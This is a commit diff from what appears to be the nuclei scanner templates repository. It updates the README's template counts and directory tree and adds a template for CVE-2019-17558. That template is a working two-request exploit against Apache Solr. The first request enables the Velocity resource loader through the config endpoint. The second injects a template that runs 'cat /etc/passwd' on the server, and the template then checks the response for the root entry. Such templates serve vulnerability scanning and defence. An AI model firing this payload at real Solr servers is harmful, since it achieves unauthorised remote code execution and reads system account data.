commit
9ef6f7f029
39
README.md
39
README.md
|
@ -6,7 +6,28 @@
|
||||||
[![Follow on Twitter](https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter)](https://twitter.com/pdnuclei)
|
[![Follow on Twitter](https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter)](https://twitter.com/pdnuclei)
|
||||||
[![Chat on Discord](https://img.shields.io/discord/695645237418131507.svg?logo=discord)](https://discord.gg/KECAGdH)
|
[![Chat on Discord](https://img.shields.io/discord/695645237418131507.svg?logo=discord)](https://discord.gg/KECAGdH)
|
||||||
|
|
||||||
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** and grow the list.
|
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
|
||||||
|
|
||||||
|
An overview of the nuclei template directory including number of templates and HTTP request associated with each directory.
|
||||||
|
|
||||||
|
### nuclei templates `v6.0.7`
|
||||||
|
|
||||||
|
| Template Directory | Number of Templates | Number of HTTP/DNS requests |
|
||||||
|
|---------------------------|--------------------------|------------------------------|
|
||||||
|
| cves |86 |131 |
|
||||||
|
| default-credentials |03 |04 |
|
||||||
|
| dns |04 |04 |
|
||||||
|
| files |34 |111 |
|
||||||
|
| generic-detections |03 |03 |
|
||||||
|
| panels |28 |82 |
|
||||||
|
| security-misconfiguration |16 |93 |
|
||||||
|
| subdomain-takeover |02 |02 |
|
||||||
|
| technologies |24 |43 |
|
||||||
|
| tokens |07 |07 |
|
||||||
|
| vulnerabilities |26 |55 |
|
||||||
|
| workflows |12 |12* |
|
||||||
|
|
||||||
|
### nuclei templates `v6.0.7` tree overview
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
<summary>Template Directory</summary>
|
<summary>Template Directory</summary>
|
||||||
|
@ -16,6 +37,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── CVE-2017-10075.yaml
|
│ ├── CVE-2017-10075.yaml
|
||||||
│ ├── CVE-2017-14849.yaml
|
│ ├── CVE-2017-14849.yaml
|
||||||
│ ├── CVE-2017-5638.yaml
|
│ ├── CVE-2017-5638.yaml
|
||||||
|
│ ├── CVE-2017-7391.yaml
|
||||||
│ ├── CVE-2017-7529.yaml
|
│ ├── CVE-2017-7529.yaml
|
||||||
│ ├── CVE-2017-9506.yaml
|
│ ├── CVE-2017-9506.yaml
|
||||||
│ ├── CVE-2017-9841.yaml
|
│ ├── CVE-2017-9841.yaml
|
||||||
|
@ -41,9 +63,11 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── CVE-2019-11510.yaml
|
│ ├── CVE-2019-11510.yaml
|
||||||
│ ├── CVE-2019-11580.yaml
|
│ ├── CVE-2019-11580.yaml
|
||||||
│ ├── CVE-2019-12314.yaml
|
│ ├── CVE-2019-12314.yaml
|
||||||
|
│ ├── CVE-2019-12461.yaml
|
||||||
│ ├── CVE-2019-14322.yaml
|
│ ├── CVE-2019-14322.yaml
|
||||||
│ ├── CVE-2019-14974.yaml
|
│ ├── CVE-2019-14974.yaml
|
||||||
│ ├── CVE-2019-15043.yaml
|
│ ├── CVE-2019-15043.yaml
|
||||||
|
│ ├── CVE-2019-16278.yaml
|
||||||
│ ├── CVE-2019-16759-1.yaml
|
│ ├── CVE-2019-16759-1.yaml
|
||||||
│ ├── CVE-2019-16759.yaml
|
│ ├── CVE-2019-16759.yaml
|
||||||
│ ├── CVE-2019-17382.yaml
|
│ ├── CVE-2019-17382.yaml
|
||||||
|
@ -70,14 +94,18 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── CVE-2020-12720.yaml
|
│ ├── CVE-2020-12720.yaml
|
||||||
│ ├── CVE-2020-13167.yaml
|
│ ├── CVE-2020-13167.yaml
|
||||||
│ ├── CVE-2020-13379.yaml
|
│ ├── CVE-2020-13379.yaml
|
||||||
|
│ ├── CVE-2020-15920.yaml
|
||||||
│ ├── CVE-2020-17505.yaml
|
│ ├── CVE-2020-17505.yaml
|
||||||
│ ├── CVE-2020-17506.yaml
|
│ ├── CVE-2020-17506.yaml
|
||||||
│ ├── CVE-2020-2096.yaml
|
│ ├── CVE-2020-2096.yaml
|
||||||
|
│ ├── CVE-2020-2140.yaml
|
||||||
|
│ ├── CVE-2020-24223.yaml
|
||||||
│ ├── CVE-2020-3187.yaml
|
│ ├── CVE-2020-3187.yaml
|
||||||
│ ├── CVE-2020-3452.yaml
|
│ ├── CVE-2020-3452.yaml
|
||||||
│ ├── CVE-2020-5284.yaml
|
│ ├── CVE-2020-5284.yaml
|
||||||
│ ├── CVE-2020-5405.yaml
|
│ ├── CVE-2020-5405.yaml
|
||||||
│ ├── CVE-2020-5410.yaml
|
│ ├── CVE-2020-5410.yaml
|
||||||
|
│ ├── CVE-2020-5412.yaml
|
||||||
│ ├── CVE-2020-5902.yaml
|
│ ├── CVE-2020-5902.yaml
|
||||||
│ ├── CVE-2020-6287.yaml
|
│ ├── CVE-2020-6287.yaml
|
||||||
│ ├── CVE-2020-7209.yaml
|
│ ├── CVE-2020-7209.yaml
|
||||||
|
@ -111,6 +139,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── drupal-install.yaml
|
│ ├── drupal-install.yaml
|
||||||
│ ├── ds_store.yaml
|
│ ├── ds_store.yaml
|
||||||
│ ├── elasticsearch.yaml
|
│ ├── elasticsearch.yaml
|
||||||
|
│ ├── error-logs.yaml
|
||||||
│ ├── exposed-kibana.yaml
|
│ ├── exposed-kibana.yaml
|
||||||
│ ├── exposed-svn.yaml
|
│ ├── exposed-svn.yaml
|
||||||
│ ├── filezilla.yaml
|
│ ├── filezilla.yaml
|
||||||
|
@ -123,6 +152,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── lazy-file.yaml
|
│ ├── lazy-file.yaml
|
||||||
│ ├── phpinfo.yaml
|
│ ├── phpinfo.yaml
|
||||||
│ ├── public-tomcat-instance.yaml
|
│ ├── public-tomcat-instance.yaml
|
||||||
|
│ ├── robots.txt.yaml
|
||||||
│ ├── security.txt.yaml
|
│ ├── security.txt.yaml
|
||||||
│ ├── server-status-localhost.yaml
|
│ ├── server-status-localhost.yaml
|
||||||
│ ├── telerik-dialoghandler-detect.yaml
|
│ ├── telerik-dialoghandler-detect.yaml
|
||||||
|
@ -130,6 +160,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── tomcat-scripts.yaml
|
│ ├── tomcat-scripts.yaml
|
||||||
│ ├── wadl-files.yaml
|
│ ├── wadl-files.yaml
|
||||||
│ ├── web-config.yaml
|
│ ├── web-config.yaml
|
||||||
|
│ ├── wordpress-debug-log.yaml
|
||||||
│ ├── wordpress-directory-listing.yaml
|
│ ├── wordpress-directory-listing.yaml
|
||||||
│ ├── wordpress-user-enumeration.yaml
|
│ ├── wordpress-user-enumeration.yaml
|
||||||
│ ├── wp-xmlrpc.yaml
|
│ ├── wp-xmlrpc.yaml
|
||||||
|
@ -164,6 +195,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── swagger-panel.yaml
|
│ ├── swagger-panel.yaml
|
||||||
│ ├── tikiwiki-cms.yaml
|
│ ├── tikiwiki-cms.yaml
|
||||||
│ ├── traefik-dashboard
|
│ ├── traefik-dashboard
|
||||||
|
│ ├── traefik-dashboard.yaml
|
||||||
│ ├── weave-scope-dashboard-detect.yaml
|
│ ├── weave-scope-dashboard-detect.yaml
|
||||||
│ ├── webeditors.yaml
|
│ ├── webeditors.yaml
|
||||||
│ └── workspaceone-uem-airWatch-dashboard-detect.yaml
|
│ └── workspaceone-uem-airWatch-dashboard-detect.yaml
|
||||||
|
@ -172,6 +204,8 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
├── security-misconfiguration
|
├── security-misconfiguration
|
||||||
│ ├── basic-cors-flash.yaml
|
│ ├── basic-cors-flash.yaml
|
||||||
│ ├── basic-cors.yaml
|
│ ├── basic-cors.yaml
|
||||||
|
│ ├── drupal-user-enum-ajax.yaml
|
||||||
|
│ ├── drupal-user-enum-redirect.yaml
|
||||||
│ ├── front-page-misconfig.yaml
|
│ ├── front-page-misconfig.yaml
|
||||||
│ ├── jira-service-desk-signup.yaml
|
│ ├── jira-service-desk-signup.yaml
|
||||||
│ ├── jira-unauthenticated-dashboards.yaml
|
│ ├── jira-unauthenticated-dashboards.yaml
|
||||||
|
@ -264,7 +298,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
13 directories, **235 templates**.
|
13 directories, **250 templates**.
|
||||||
|
|
||||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding.
|
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding.
|
||||||
|
|
||||||
|
@ -274,3 +308,4 @@ Please navigate to https://nuclei.projectdiscovery.io for detailed documentation
|
||||||
2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests.
|
2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests.
|
||||||
|
|
||||||
Thanks again for your contribution and keeping the community vibrant. :heart:
|
Thanks again for your contribution and keeping the community vibrant. :heart:
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,58 @@
|
||||||
|
id: CVE-2019-17558
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
|
||||||
|
# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133
|
||||||
|
# https://nvd.nist.gov/vuln/detail/CVE-2019-17558
|
||||||
|
# Issues:-https://issues.apache.org/jira/browse/SOLR-13971
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw: # Request: set "params.resource.loader.enabled"
|
||||||
|
- |
|
||||||
|
POST /solr/atom/config HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Connection: close
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 259
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
{
|
||||||
|
"update-queryresponsewriter": {
|
||||||
|
"startup": "lazy",
|
||||||
|
"name": "velocity",
|
||||||
|
"class": "solr.VelocityResponseWriter",
|
||||||
|
"template.base.dir": "",
|
||||||
|
"solr.resource.loader.enabled": "true",
|
||||||
|
"params.resource.loader.enabled": "true"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
# RCE via velocity template:
|
||||||
|
# Get /etc/passwd
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0:"
|
||||||
|
part: body
|
Loading…
Reference in New Issue